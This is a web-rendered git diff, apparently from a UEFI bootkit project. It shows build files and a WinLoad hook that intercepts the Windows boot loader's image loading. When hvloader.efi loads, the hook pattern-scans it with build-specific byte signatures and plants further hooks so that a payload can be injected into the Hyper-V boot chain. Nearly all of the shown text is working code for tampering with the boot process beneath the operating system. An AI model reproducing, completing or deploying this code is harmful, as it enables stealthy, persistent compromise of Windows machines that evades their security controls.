<AdditionalDependencies>UefiHiiLib.lib;UefiHiiServicesLib.lib;UefiSortLib.lib;UefiShellLib.lib;GlueLib.lib;BaseLib.lib;BaseDebugPrintErrorLevelLib.lib;BasePrintLib.lib;UefiLib.lib;UefiBootServicesTableLib.lib;UefiRuntimeServicesTableLib.lib;UefiDevicePathLibDevicePathProtocol.lib;UefiDebugLibConOut.lib;UefiMemoryLib.lib;UefiMemoryAllocationLib.lib;BaseSynchronizationLib.lib;UefiFileHandleLib.lib;UefiApplicationEntryPoint.lib</AdditionalDependencies>
|
||||
<IgnoreAllDefaultLibraries>true</IgnoreAllDefaultLibraries>
|
||||
<EntryPointSymbol>EfiMain</EntryPointSymbol>
|
||||
</Link>
|
||||
<ProjectReference>
|
||||
<UseLibraryDependencyInputs>true</UseLibraryDependencyInputs>
|
||||
</ProjectReference>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="BootMgfw.c" />
|
||||
<ClCompile Include="Hvix64.c" />
|
||||
<ClCompile Include="HvLoader.c" />
|
||||
<ClCompile Include="ShitHook.c" />
|
||||
<ClCompile Include="PayLoad.c" />
|
||||
<ClCompile Include="UefiMain.c" />
|
||||
<ClCompile Include="Utils.c" />
|
||||
<ClCompile Include="WinLoad.c" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="BootMgfw.h" />
|
||||
<ClInclude Include="Hvix64.h" />
|
||||
<ClInclude Include="HvLoader.h" />
|
||||
<ClInclude Include="ShitHook.h" />
|
||||
<ClInclude Include="PayLoad.h" />
|
||||
<ClInclude Include="Utils.h" />
|
||||
<ClInclude Include="WinLoad.h" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
@ -0,0 +1,62 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="UefiMain.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="WinLoad.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="BootMgfw.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ShitHook.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Utils.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Hvix64.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="PayLoad.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="HvLoader.c">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="BootMgfw.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="WinLoad.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="Hvix64.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="ShitHook.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="Utils.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="PayLoad.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="HvLoader.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
</Project>
|
@ -0,0 +1,43 @@
|
||||
#include "WinLoad.h"
|
||||
|
||||
SHITHOOK WinLoadImageShitHook;
|
||||
CHAR8 ModulePathCStr[0x100];
|
||||
|
||||
EFI_STATUS EFIAPI BlImgLoadPEImageEx(VOID* a1, VOID* a2, CHAR16* ImagePath, UINT64* ImageBasePtr, UINT32* ImageSize,
|
||||
VOID* a6, VOID* a7, VOID* a8, VOID* a9, VOID* a10, VOID* a11, VOID* a12, VOID* a13, VOID* a14)
|
||||
{
|
||||
UnicodeStrToAsciiStr(ImagePath, ModulePathCStr);
|
||||
DBG_PRINT(ModulePathCStr);
|
||||
|
||||
DisableShitHook(&WinLoadImageShitHook);
|
||||
EFI_STATUS Result = ((LDR_LOAD_IMAGE)WinLoadImageShitHook.Address)(a1, a2, ImagePath, ImageBasePtr, ImageSize, a6, a7, a8,
|
||||
a9, a10, a11, a12, a13, a14);
|
||||
EnableShitHook(&WinLoadImageShitHook);
|
||||
|
||||
if (StrStr(ImagePath, L"hvloader.efi"))
|
||||
{
|
||||
VOID* LoadImage =
|
||||
FindPattern(
|
||||
*ImageBasePtr,
|
||||
*ImageSize,
|
||||
HV_LOAD_PE_IMG_SIG,
|
||||
HV_LOAD_PE_IMG_MASK
|
||||
);
|
||||
|
||||
VOID* AllocImage =
|
||||
FindPattern(
|
||||
*ImageBasePtr,
|
||||
*ImageSize,
|
||||
ALLOCATE_IMAGE_BUFFER_SIG,
|
||||
ALLOCATE_IMAGE_BUFFER_MASK
|
||||
);
|
||||
|
||||
MakeShitHook(&HvLoadImageHook, RESOLVE_RVA(LoadImage, 5, 1), &HvBlImgLoadPEImageFromSourceBuffer, TRUE);
|
||||
MakeShitHook(&HvLoadAllocImageHook, RESOLVE_RVA(AllocImage, 5, 1), &HvLoaderBlImgAllocateImageBuffer, TRUE);
|
||||
DBG_PRINT("LoadImageHook -> 0x%p\n", RESOLVE_RVA(LoadImage, 5, 1));
|
||||
DBG_PRINT("AllocImage -> 0x%p\n", RESOLVE_RVA(AllocImage, 5, 1));
|
||||
}
|
||||
|
||||
DBG_PRINT("[%s] Image Base -> 0x%p, Image Size -> 0x%p\n", __FUNCTION__, *ImageBasePtr, *ImageSize);
|
||||
return Result;
|
||||
}
|
@ -0,0 +1,21 @@
|
||||
#pragma once
|
||||
#include "Utils.h"
|
||||
#include "HvLoader.h"
|
||||
#include "PayLoad.h"
|
||||
|
||||
extern SHITHOOK WinLoadImageShitHook;
|
||||
|
||||
#if WINVER == 1703
|
||||
#define LOAD_PE_IMG_SIG "\xE8\x00\x00\x00\x00\x85\xC0\x79\x45"
|
||||
#define LOAD_PE_IMG_MASK "x????xxxx"
|
||||
#elif WINVER == 1607
|
||||
#define LOAD_PE_IMG_SIG "\xE8\x00\x00\x00\x00\x48\x8B\x7D\xF7"
|
||||
#define LOAD_PE_IMG_MASK "x????xxxx"
|
||||
#endif
|
||||
|
||||
static_assert(sizeof(LOAD_PE_IMG_SIG) == sizeof(LOAD_PE_IMG_MASK), "signature and mask do not match size...");
|
||||
typedef EFI_STATUS (EFIAPI* LDR_LOAD_IMAGE)(VOID* a1, VOID* a2, CHAR16* ImagePath, UINT64* ImageBasePtr, UINT32* ImageSize,
|
||||
VOID* a6, VOID* a7, VOID* a8, VOID* a9, VOID* a10, VOID* a11, VOID* a12, VOID* a13, VOID* a14);
|
||||
|
||||
EFI_STATUS EFIAPI BlImgLoadPEImageEx(VOID* a1, VOID* a2, CHAR16* ImagePath, UINT64* ImageBasePtr, UINT32* ImageSize,
|
||||
VOID* a6, VOID* a7, VOID* a8, VOID* a9, VOID* a10, VOID* a11, VOID* a12, VOID* a13, VOID* a14);
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in new issue